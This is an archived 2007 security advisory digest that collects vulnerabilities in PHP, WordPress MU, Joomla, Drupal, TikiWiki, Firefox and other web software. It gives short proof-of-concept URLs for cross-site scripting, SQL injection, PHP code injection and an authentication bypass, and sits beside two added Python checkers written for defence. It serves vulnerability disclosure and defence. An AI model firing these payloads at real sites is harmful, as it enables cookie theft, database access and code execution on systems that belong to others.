
russian-multi.txt
Posted Oct 11, 2007
Site securityvulns.ru

Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.

tags | exploit, php, vulnerability
SHA-256 | fb869b5b3ce55625ab55a47de8fcf2451573a9cbadef41728be9a23809d9f5e8

Dear bugtraq@securityfocus.com,

Vulnerabilities reported by different Russian-speaking authors to
http://securityvulns.ru

1. Elekt (Antichat.ru) reports a protection bypass vulnerability in PHP 4
and 5.

The disable_functions feature can be bypassed by using function aliases. A
list of aliases is given at http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.

SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html
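
An audit for the gap described in item 1, as an added example that is not part of the original advisory: it reads the disable_functions line of a php.ini and lists names that stay callable because only one side of an alias pair was disabled. The alias table is a small subset picked for illustration and the sample configuration is constructed.

```python
import re

# Subset of the PHP manual's alias list, chosen for this example; extend it
# from http://php.net/aliases/ before relying on the result.
ALIAS_PAIRS = [
    ("ini_alter", "ini_set"),
    ("show_source", "highlight_file"),
    ("fputs", "fwrite"),
    ("set_file_buffer", "stream_set_write_buffer"),
    ("socket_set_timeout", "stream_set_timeout"),
]

# Map every name to the full group of names that reach the same function.
EQUIVALENTS = {}
for alias, master in ALIAS_PAIRS:
    group = EQUIVALENTS.get(alias, {alias}) | EQUIVALENTS.get(master, {master})
    for name in group:
        EQUIVALENTS[name] = group

def parse_disable_functions(ini_text):
    """Return the names listed by the last active disable_functions line."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0]  # drop php.ini comments
        m = re.match(r"\s*disable_functions\s*=\s*(.*)", line)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {n.strip().lower() for n in value.split(",") if n.strip()}
    return disabled

def missing_aliases(ini_text):
    """Map each disabled name to its equivalents that are still enabled."""
    disabled = parse_disable_functions(ini_text)
    gaps = {}
    for name in sorted(disabled):
        still_open = EQUIVALENTS.get(name, set()) - disabled
        if still_open:
            gaps[name] = sorted(still_open)
    return gaps

# Constructed sample configuration, not taken from a real host.
SAMPLE_INI = """\
; hardening section
disable_functions = exec, system, ini_set, show_source, fwrite
"""

if __name__ == "__main__":
    for name, aliases in missing_aliases(SAMPLE_INI).items():
        print(f"{name} is disabled but still reachable as: {', '.join(aliases)}")
```
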

2. MustLive reports a cross-site scripting vulnerability in WordPress
MultiUser 1.0

XSS is possible via the Username form field.

Additional information (in Ukrainian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html

3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5

Example:

http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

Original message (in Russian): http://securityvulns.ru/Rdocument901.html

4. MustLive reports a cross-site scripting vulnerability in Joomla! <= 1.0.13

An example of the vulnerability is

http://site/index.php?option=com_search&searchword=';alert('XSS')//

Additional information (in Ukrainian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html

5. durito [NGH Group] reports a cross-site scripting vulnerability in
ActiveKB NX 2.5.4

Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]

Original message (in Russian): http://securityvulns.ru/Rdocument956.html

6. "noname indexed" reports a vulnerability in UMI CMS (http://uni-cms.ru)

Vulnerability example:

http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();

Original message (in Russian): http://securityvulns.ru/Rdocument957.html

7. MustLive reports a cross-site scripting vulnerability in Nucleus.

Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukrainian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html

8. durito [NGH Group] reports

8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:

Content Management System

http://www.example.com/main.php?p=[SQL]

Merchant

http://www.example.com/shop.php?cmd=sto&id=[SQL]

Courses

http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]

8.2 Information leak (FTP access account) with MyFTPUploader within the
same applications. Example:

http://www.example.com/include/imageupload.js

contains

document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');

8.3 Default administrator's password for the same applications.

Original message (in Russian): http://securityvulns.ru/Sdocument4.html

9. MustLive reports multiple cross-site scripting vulnerabilities in
Site-Up <= 2.64

Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:

Additional information (in Ukrainian): http://websecurity.com.ua/1210/
Original message (in Russian): http://securityvulns.ru/Sdocument12.html

10. MustLive reports cross-site scripting in Google Search Appliance.

Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'

Additional information (in Ukrainian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html

10. MustLive reports cross-site scripting in PRO-search

Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukrainian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html

10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to a re-discovered XSS vulnerability, there is also an
authentication bypass (access without username/password).

Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5

Additional information (in Ukrainian): http://websecurity.com.ua/1283/
Original message (in Russian): http://securityvulns.ru/Sdocument90.html

11. MustLive reports a cross-site scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URLs if page content is displayed as
UTF-7. Examples:

For Firefox before 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According to the author, it's possible to execute script in both the local
zone and the context of the gopher site.
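
Why the strings in item 11 pass a filter that only looks for literal markup, shown as an added example that is not part of the original advisory: the check below decodes input the way a UTF-7 renderer would and reports markup characters that exist only in that view. The function names are hypothetical and the samples are the selector parts of the advisory's own examples.

```python
import re
from urllib.parse import unquote

# A UTF-7 shift sequence: '+', modified-base64 characters, optional '-'.
SHIFT_SEQUENCE = re.compile(r"\+[A-Za-z0-9+/]+-?")
MARKUP = re.compile(r"[<>\"']")

def utf7_view(text):
    """Return text as a UTF-7 decoder would render it, or None if invalid."""
    try:
        # unquote() leaves '+' alone, which is what UTF-7 needs.
        return unquote(text).encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return None

def hidden_markup(text):
    """Markup characters that appear only after UTF-7 decoding."""
    raw = unquote(text)
    if not SHIFT_SEQUENCE.search(raw):
        return set()
    decoded = utf7_view(text)
    if decoded is None:
        return set()
    return set(MARKUP.findall(decoded)) - set(MARKUP.findall(raw))

# Selector strings copied from the examples in item 11 of the advisory.
SAMPLES = [
    "1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-",
    "1Turn%20on%20UTF-7%20to%20view%20this%20message%20"
    "+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sorted(hidden_markup(sample)), "<-", utf7_view(sample))
```

For web responses, declaring the charset explicitly in the Content-Type header removes the ambiguity this check looks for.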

12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

Original message (in Russian): http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian): http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html

--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/